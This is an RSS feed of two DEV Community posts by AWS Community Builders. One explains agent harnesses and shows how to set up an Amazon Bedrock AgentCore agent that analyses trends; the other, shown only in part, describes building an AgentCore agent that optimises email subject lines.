<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: AWS Community Builders </title>
    <description>The latest articles on DEV Community by AWS Community Builders  (@aws-builders).</description>
    <link>https://dev.to/aws-builders</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Forganization%2Fprofile_image%2F2794%2F88da75b6-aadd-4ea1-8083-ae2dfca8be94.png</url>
      <title>DEV Community: AWS Community Builders </title>
      <link>https://dev.to/aws-builders</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/aws-builders"/>
    <language>en</language>
    <item>
      <title>What Is an Agent Harness? And Why Every AI Agent Needs One</title>
      <dc:creator>SURYANSH GUPTA</dc:creator>
      <pubDate>Sat, 09 May 2026 07:28:09 +0000</pubDate>
      <link>https://dev.to/aws-builders/what-is-an-agent-harness-and-why-every-ai-agent-needs-one-382l</link>
      <guid>https://dev.to/aws-builders/what-is-an-agent-harness-and-why-every-ai-agent-needs-one-382l</guid>
      <description>&lt;p&gt;If you've spent any time building with AI lately, you've probably heard the word "agent" thrown around a lot. But here's something that doesn't get talked about nearly as much: &lt;strong&gt;before you can have a real AI agent, you need a harness.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I know that term might sound unfamiliar or even a little abstract. When I first came across it, I had the same reaction. But once it clicked, I couldn't unsee it — and I genuinely think it's one of the most important concepts to understand if you want to go beyond just calling an LLM API and actually building something that &lt;em&gt;does things&lt;/em&gt; autonomously.&lt;/p&gt;

&lt;p&gt;Let's break it all down from scratch.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Problem With "Just Using a Model"
&lt;/h2&gt;

&lt;p&gt;Picture this: you've got API access to a powerful model like Claude or GPT-4. You send it a prompt, it sends back a response. That's great for chatbots and one-shot completions — but what if you want the model to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Browse the web and pull real-time data?&lt;/li&gt;
&lt;li&gt;Execute Python code to analyze that data?&lt;/li&gt;
&lt;li&gt;Remember what you told it last week?&lt;/li&gt;
&lt;li&gt;Coordinate across multiple steps — each one depending on the last?&lt;/li&gt;
&lt;li&gt;Call your internal APIs or tools?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A raw model, on its own, can't do any of that. It can &lt;em&gt;talk&lt;/em&gt; about doing those things, but it has no way to actually &lt;em&gt;carry them out&lt;/em&gt;. It's like hiring a brilliant analyst who has no laptop, no internet, and can only communicate by passing notes. The intelligence is there — the infrastructure is not.&lt;/p&gt;

&lt;p&gt;That missing infrastructure is the harness.&lt;/p&gt;




&lt;h2&gt;
  
  
  So, What Exactly Is an Agent Harness?
&lt;/h2&gt;

&lt;p&gt;An agent harness is everything you build &lt;em&gt;around&lt;/em&gt; a model to transform it from a text-generator into an agent that can act in the real world.&lt;/p&gt;

&lt;p&gt;The cleanest formula I've come across is:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Agent = Model + Harness&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Anything in your agent that isn't the model itself — is part of the harness.&lt;/p&gt;

&lt;p&gt;In concrete terms, the harness typically includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The orchestration loop&lt;/strong&gt; — the logic that takes a user message, asks the model what to do, runs that action, feeds the result back, and repeats until the task is complete.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tool connections&lt;/strong&gt; — the plumbing that lets the model call a browser, run code, query a database, or hit an external API.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory&lt;/strong&gt; — short-term context within a session AND long-term memory that persists across sessions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Context management&lt;/strong&gt; — deciding what information goes into the prompt at each step (you can't just keep appending forever — models have token limits).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compute and sandboxing&lt;/strong&gt; — somewhere safe for the agent to run code without blowing up your system.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Authentication&lt;/strong&gt; — so your agent can securely call external APIs without leaking credentials.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Observability&lt;/strong&gt; — logs, traces, and debugging tools so you know what happened when things go sideways at 2 AM.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Session management&lt;/strong&gt; — the ability for users to pause and resume, pick up right where they left off.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Look at any AI-powered product you use today — Claude Code, GitHub Copilot, Cursor, Perplexity — and behind the scenes, there's a harness doing all of this work. The model is just one piece of a much larger machine.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why Harness Building Has Been So Painful
&lt;/h2&gt;

&lt;p&gt;Here's the honest reality: building a harness from scratch is &lt;em&gt;hard&lt;/em&gt; and &lt;em&gt;time-consuming&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;If you've done it before, you know the drill. You pick a framework — LangGraph, LlamaIndex, CrewAI, Strands Agents — and start writing code. You wire up your tools. You manage your prompt structure carefully so the model doesn't get confused. You add error handling for when tool calls fail. You build retry logic. You handle streaming output. You set up logging. You package everything into a container, provision some compute, and deploy it.&lt;/p&gt;

&lt;p&gt;And then you realize you need session persistence. So you add a database. And then you realize you need the agent to authenticate with an external API. So you set up credential management. And now you need to understand why the agent went down a weird reasoning path, so you add tracing.&lt;/p&gt;

&lt;p&gt;For a straightforward use case, this might take a few days. For a complex one, it could take weeks — and a whole team.&lt;/p&gt;

&lt;p&gt;This is the real barrier to building with AI agents. Not the model. The harness.&lt;/p&gt;




&lt;h2&gt;
  
  
  Enter Managed Harnesses: The Agent Factory Model
&lt;/h2&gt;

&lt;p&gt;Tooling has finally started catching up to this problem. The idea behind a managed harness is simple: instead of writing all that orchestration and infrastructure code yourself, you declare what your agent needs as &lt;em&gt;configuration&lt;/em&gt;, and the service builds the harness for you.&lt;/p&gt;

&lt;p&gt;Think of it like the difference between setting up your own server (writing harness code from scratch) versus using a managed cloud service (declaring config and letting the platform handle the rest).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Amazon Bedrock AgentCore&lt;/strong&gt; is one of the services taking this approach. With AgentCore's harness feature, you define your agent in a JSON config file — model, system prompt, tools, memory settings — and the platform compiles that into a fully running agent, handling all the infrastructure underneath.&lt;/p&gt;

&lt;p&gt;Under the hood, AgentCore harness uses &lt;strong&gt;Strands Agents&lt;/strong&gt; (AWS's open-source agent SDK) to assemble the orchestration loop, tool execution, memory management, context handling, and streaming. Then it runs the whole thing inside an isolated &lt;strong&gt;microVM&lt;/strong&gt; — its own dedicated CPU, memory, and filesystem — without you provisioning a single server.&lt;/p&gt;




&lt;h2&gt;
  
  
  Let's Build Something: An AI Trends Analyst in Minutes
&lt;/h2&gt;

&lt;p&gt;To make this concrete, here's how you'd go from zero to a working AI agent using AgentCore harness — and yes, this genuinely takes about 5 minutes.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Goal
&lt;/h3&gt;

&lt;p&gt;Build an agent that browses HackerNews and dev.to, pulls today's top AI and developer tools posts, clusters them by topic, and produces a ranked summary with a chart — all autonomously.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Install the CLI
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; @aws/agentcore@preview
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Create Your Agent Config Interactively
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore create
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command walks you through a set of prompts — which model to use, which tools to enable, authentication type, and so on. At the end, it generates a config file like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"TrendsAgentHarness"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"model"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"provider"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"bedrock"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"modelId"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"global.anthropic.claude-sonnet-4-6"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"tools"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"agentcore_browser"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"browser"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"agentcore_code_interpreter"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"code-interpreter"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"skills"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"authorizerType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"AWS_IAM"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. The browser tool lets the agent navigate real websites. The code interpreter gives it a Python sandbox to crunch data and generate charts.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Write Your System Prompt
&lt;/h3&gt;

&lt;p&gt;Edit the &lt;code&gt;system-prompt.md&lt;/code&gt; file that was created alongside the config:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;Your job is to keep a pulse on what the AI and dev community is buzzing 
about right now. Every session, head over to HackerNews and dev.to, 
scrape today's hottest posts, then use the code interpreter to make sense 
of it all — cluster the topics, rank them by how often they show up, and 
summarize the top 5 in plain language. Throw in a bar chart. No fluff.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The system prompt is your agent's personality and operating instructions. This is where you define what it does, how it thinks, and what output you expect from it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Deploy It
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore deploy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Behind the scenes, this takes your config and system prompt, assembles a Strands Agents program, and deploys it into a managed microVM environment. No Dockerfile, no Kubernetes, no EC2 instance. Just one command.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 5: Invoke It
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore invoke &lt;span class="nt"&gt;--harness&lt;/span&gt; TrendsAgentHarness &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--session-id&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;uuidgen&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="s2"&gt;"What's trending in IT today?"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What happens when you run this:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The agent opens a browser and navigates to HackerNews.&lt;/li&gt;
&lt;li&gt;It scrolls through and reads the top posts.&lt;/li&gt;
&lt;li&gt;It does the same on dev.to.&lt;/li&gt;
&lt;li&gt;It pulls all the results into the code interpreter.&lt;/li&gt;
&lt;li&gt;It runs Python to cluster topics, calculate frequency, and build a bar chart.&lt;/li&gt;
&lt;li&gt;It streams a formatted summary back to your terminal.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;All of this runs in an isolated microVM that spins up for this session and tears down when it's done. No cross-session data leakage, no noisy neighbors.&lt;/p&gt;




&lt;h2&gt;
  
  
  What Comes Built In
&lt;/h2&gt;

&lt;p&gt;Here's a breakdown of what AgentCore harness gives you without any extra setup:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;What It Actually Means For You&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Isolated microVM per session&lt;/td&gt;
&lt;td&gt;Your agent gets its own CPU, memory, and filesystem. Sessions are completely isolated from each other.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Shell access&lt;/td&gt;
&lt;td&gt;The agent can run shell commands directly without going through the model's reasoning loop — faster and cheaper.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistent filesystem&lt;/td&gt;
&lt;td&gt;Mid-session, the agent can save files, pause, and resume exactly where it left off.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Model-agnostic routing&lt;/td&gt;
&lt;td&gt;Switch between Bedrock, OpenAI, and Google Gemini. You can even change providers mid-session and the conversation context stays intact.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Built-in browser tool&lt;/td&gt;
&lt;td&gt;Powered by AgentCore Browser — the agent can navigate real websites, not just search APIs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Built-in code interpreter&lt;/td&gt;
&lt;td&gt;A full Python sandbox. The agent can write and execute code, generate charts, process files, and more.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MCP server support&lt;/td&gt;
&lt;td&gt;Connect to any MCP-compatible tool server — Slack, Notion, GitHub, whatever your workflow needs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AgentCore Gateway&lt;/td&gt;
&lt;td&gt;Connect to APIs you've registered centrally, so credentials are managed outside the agent.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Custom tool definitions&lt;/td&gt;
&lt;td&gt;Define your own inline function tools for the agent to call.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Skills&lt;/td&gt;
&lt;td&gt;Package domain knowledge as markdown + scripts and give your agent expert-level context on demand.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Full observability&lt;/td&gt;
&lt;td&gt;Every action is auto-traced via AgentCore Observability, so you can debug and audit everything that happened.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Agent Skills: Teaching Your Agent Domain Expertise
&lt;/h2&gt;

&lt;p&gt;One feature worth calling out specifically is &lt;strong&gt;skills&lt;/strong&gt;. An agent skill is a bundle of markdown instructions and (optionally) scripts that gives your agent deep knowledge about a specific domain or workflow.&lt;/p&gt;

&lt;p&gt;Think of it this way: you can train a general model on your specific context. For example:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A skill that teaches the agent how to work with your internal data format.&lt;/li&gt;
&lt;li&gt;A skill that walks the agent through your company's API conventions.&lt;/li&gt;
&lt;li&gt;A skill that gives the agent step-by-step knowledge of how to process Excel reports your way.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You package the skill into the agent's environment, point the harness at it, and the agent picks it up and uses it automatically when relevant. No fine-tuning. No custom model training. Just structured knowledge the agent can reference.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Escape Hatch: When You Outgrow Config
&lt;/h2&gt;

&lt;p&gt;One question you might be asking: "What happens when my use case gets complex enough that a config file isn't enough?"&lt;/p&gt;

&lt;p&gt;That's a fair and important question. Maybe you need:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Custom multi-agent orchestration where agents hand off tasks to each other.&lt;/li&gt;
&lt;li&gt;Specialized routing logic based on the content of a message.&lt;/li&gt;
&lt;li&gt;A fully custom memory layer with your own vector database.&lt;/li&gt;
&lt;li&gt;Integration with internal infrastructure that doesn't fit a standard pattern.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;AgentCore harness has an answer for this: &lt;strong&gt;export to code&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;When you need full control, you can export your harness configuration to Strands Agents code. You get the equivalent Python program that AgentCore was running for you — fully readable, fully editable — and you can extend it however you need. You stay on the same platform, just with more control.&lt;/p&gt;

&lt;p&gt;This is a smart design. You start with the fast path (config), and you graduate to the custom path (code) only when you actually need it. You're not locked into one or the other.&lt;/p&gt;




&lt;h2&gt;
  
  
  Common Questions Answered
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Do I need to build a harness if I'm just using Claude.ai or ChatGPT?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. Those are consumer products where someone else already built the harness for you. You need to build your own when you're creating &lt;em&gt;custom&lt;/em&gt; agents — ones that call your specific tools, connect to your internal systems, maintain state, or run autonomously over multiple steps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is a harness the same as an agent framework?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not quite. A framework (like Strands Agents, LangGraph, or CrewAI) gives you the building blocks — tool interfaces, loop patterns, model connectors. A harness is the fully assembled, running system: framework code plus compute, sandboxing, memory, auth, and observability. You use a framework to &lt;em&gt;build&lt;/em&gt; a harness, or you use a managed service to build one &lt;em&gt;for you&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can I build a harness without a framework?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Technically yes, but you'd be writing the entire orchestration loop, tool dispatch, error recovery, and context management from scratch. Frameworks exist precisely so you don't have to. It's a bit like writing raw socket code instead of using Express.js — possible, but almost never the right call.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is the browser tool expensive on tokens?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Yes, it does consume more tokens than simpler tools since it's processing full web pages. For the trends analyst use case, it's absolutely worth it. For agents that need lighter-weight data fetching, you might want to explore API-based tools or MCP servers that return structured data instead.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why This Matters for the Community
&lt;/h2&gt;

&lt;p&gt;For a long time, building a production-grade AI agent required deep expertise across model APIs, orchestration frameworks, cloud infrastructure, and security. That's a lot of disciplines to combine, and it's been a genuine barrier for developers who want to experiment and build.&lt;/p&gt;

&lt;p&gt;Managed harness services like AgentCore change that equation. The gap between "I have an idea for an agent" and "I have a running agent" is now measured in minutes for straightforward use cases. That's genuinely exciting.&lt;/p&gt;

&lt;p&gt;It also means the interesting work shifts. Instead of spending your energy on infrastructure plumbing, you can focus on:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What should your agent actually &lt;em&gt;do&lt;/em&gt;?&lt;/li&gt;
&lt;li&gt;What domain knowledge does it need?&lt;/li&gt;
&lt;li&gt;What tools should it have access to?&lt;/li&gt;
&lt;li&gt;How should it reason and communicate?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Those are the questions worth spending your time on.&lt;/p&gt;




&lt;h2&gt;
  
  
  Where to Go From Here
&lt;/h2&gt;

&lt;p&gt;AgentCore harness is currently in &lt;strong&gt;public preview&lt;/strong&gt; in four AWS regions: US West (Oregon), US East (N. Virginia), Europe (Frankfurt), and Asia Pacific (Sydney).&lt;/p&gt;

&lt;p&gt;Here are the resources to get started:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/bedrock/latest/userguide/agentcore.html" rel="noopener noreferrer"&gt;AgentCore harness documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://strandsagents.com" rel="noopener noreferrer"&gt;Strands Agents SDK (open source)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/bedrock/pricing/" rel="noopener noreferrer"&gt;AgentCore pricing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The trends analyst agent described in this post — browsing HackerNews, clustering AI topics, generating a chart — took about 5 minutes from idea to first working invocation. The JSON config is 15 lines. The system prompt is 5 lines.&lt;/p&gt;

&lt;p&gt;What would you build with 5 minutes and a config file? I'd love to see what the community comes up with. Drop your ideas or experiments in the comments.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;If this post helped you understand agent harnesses better, consider sharing it with someone who's been struggling to wrap their head around the agent architecture puzzle. And if you're already building harnesses the hard way, maybe it's time to let the factory do some of that work for you.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>mcp</category>
      <category>serverless</category>
    </item>
    <item>
      <title>Cracking the Bedrock, Reaching the Core: Building Agents with AWS AgentCore Runtime and Memory</title>
      <dc:creator>Ana Silva</dc:creator>
      <pubDate>Fri, 08 May 2026 23:49:40 +0000</pubDate>
      <link>https://dev.to/aws-builders/cracking-the-bedrock-reaching-the-core-building-agents-with-aws-agentcore-runtime-and-memory-32kg</link>
      <guid>https://dev.to/aws-builders/cracking-the-bedrock-reaching-the-core-building-agents-with-aws-agentcore-runtime-and-memory-32kg</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fu3zhmezad44ijjrqxg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fu3zhmezad44ijjrqxg.png" alt="Moses Striking the Rock — Joachim Anthonisz Wtewael, 1624" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This article walks through a project I built on Amazon Bedrock AgentCore: an agent that turns campaign briefings into ranked email subject lines, and improves across sessions as it learns from the user.&lt;/p&gt;

&lt;p&gt;The goal here isn’t to cover every AgentCore primitive, but to show how a few of them (Runtime and Memory) fit together in a real loop, and to be honest about which ones I deliberately left out. The project itself is intentionally small. The interesting part is the architecture around it: where scoring runs, why the optimization loop stays framework-agnostic, what memory actually stores and which tradeoffs come with each decision.&lt;/p&gt;

&lt;p&gt;*👉 You can access the project on &lt;a href="https://github.com/anacds/subjectLineOptimizer/" rel="noopener noreferrer"&gt;Github&lt;/a&gt;.&lt;br&gt;
*&lt;/p&gt;


&lt;h2&gt;
  
  
  Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Agents-to-AgentCore Evolution&lt;/li&gt;
&lt;li&gt;The use case: briefing in, subject lines out&lt;/li&gt;
&lt;li&gt;Drafting a solution&lt;/li&gt;
&lt;li&gt;I. The entrypoint (main.py)&lt;/li&gt;
&lt;li&gt;II. The imperative shell (agent/builder.py)&lt;/li&gt;
&lt;li&gt;III. The functional core (agent/iteration.py)&lt;/li&gt;
&lt;li&gt;IV. Scoring&lt;/li&gt;
&lt;li&gt;V. The two agents and Bedrock&lt;/li&gt;
&lt;li&gt;VI. AgentCore Memory: four strategies&lt;/li&gt;
&lt;li&gt;VII. Observability&lt;/li&gt;
&lt;li&gt;VIII. What I didn't use this time&lt;/li&gt;
&lt;li&gt;IX. How to deploy and run it&lt;/li&gt;
&lt;li&gt;Closing thoughts&lt;/li&gt;
&lt;/ol&gt;


&lt;h2&gt;
  
  
  Agents-to-AgentCore Evolution
&lt;/h2&gt;

&lt;p&gt;Bedrock was launched in 2023 as AWS's response to the rapid growth of foundation models use: a single API to call models from companies such as Anthropic, AI21 Labs, Cohere or even Amazon's own Titan family, without managing inference infrastructure. Later that year AWS added Bedrock Agents, a configuration-driven product that bolted tool-calling, knowledge bases, and memory onto a Bedrock model.&lt;/p&gt;

&lt;p&gt;It works for many cases, but it is a closed product: the ecosystem strongly revolves around Lambda-based tool execution, retrieval has to be Knowledge Bases, models have to be Bedrock-hosted, and you can't see or control how the agent decides what to do at each step. For more ambitious use cases, teams end up bypassing Bedrock Agents and writing their own harness on EC2 or Lambda, which meant rebuilding the same plumbing every team had to rebuild: session management, sandboxing, identity, memory and observability.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj4ap50pr38rf8jh9iq9b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj4ap50pr38rf8jh9iq9b.png" alt="From AWS Docs: https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/what-is-bedrock-agentcore.html" width="800" height="571"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;AgentCore, announced in 2025, was AWS's evolution to that pattern. Instead of a single "agent product," it broke the harness apart into composable services and made them framework-agnostic, so you could bring Strands, LangGraph, CrewAI or anything else. April 2026 added the managed Harness, which closed the loop: Harness offers the same easy, configuration-based approach as Bedrock Agents, but it runs on the AgentCore platform and lets you switch to code when you need more control.&lt;/p&gt;

&lt;p&gt;AWS continues to maintain both Bedrock Agents and AgentCore in parallel. Bedrock Agents remains available for teams that already use it or prefer a fully managed, configuration-only approach, while AgentCore is positioned as the path forward for new projects that need flexibility, framework choice or production-grade infrastructure.&lt;/p&gt;


&lt;h2&gt;
  
  
  The use case: briefing in, subject lines out
&lt;/h2&gt;

&lt;p&gt;Email subject lines have an outsized effect on open rates and they're often the only impression a campaign makes. Marketers who have the volume and the time for A/B testing can ship two or more variants and let the data decide. Many marketers don't, so they write a subject line, second-guess it and hit send.&lt;/p&gt;

&lt;p&gt;Imagine that you run email marketing for a specialty coffee brand. You open the optimizer, fill in the briefing and set a few constraints: nothing longer than 55 characters, no discount language, no emojis. You hit optimize and watch the rounds come in. Round one produces 8 candidates covering the full stylistic range, from urgency-led to curiosity-led to plain and direct. The scorer immediately tells you which ones carry spam risk, which ones are the right length, which ones align with a retention audience. The weakest three get dropped and the Critic explains why. Round two regenerates those slots with that guidance in mind. By round three the scores have converged and you have a ranked shortlist of five, each with a predicted open-rate band and a breakdown of what drove the score.&lt;/p&gt;

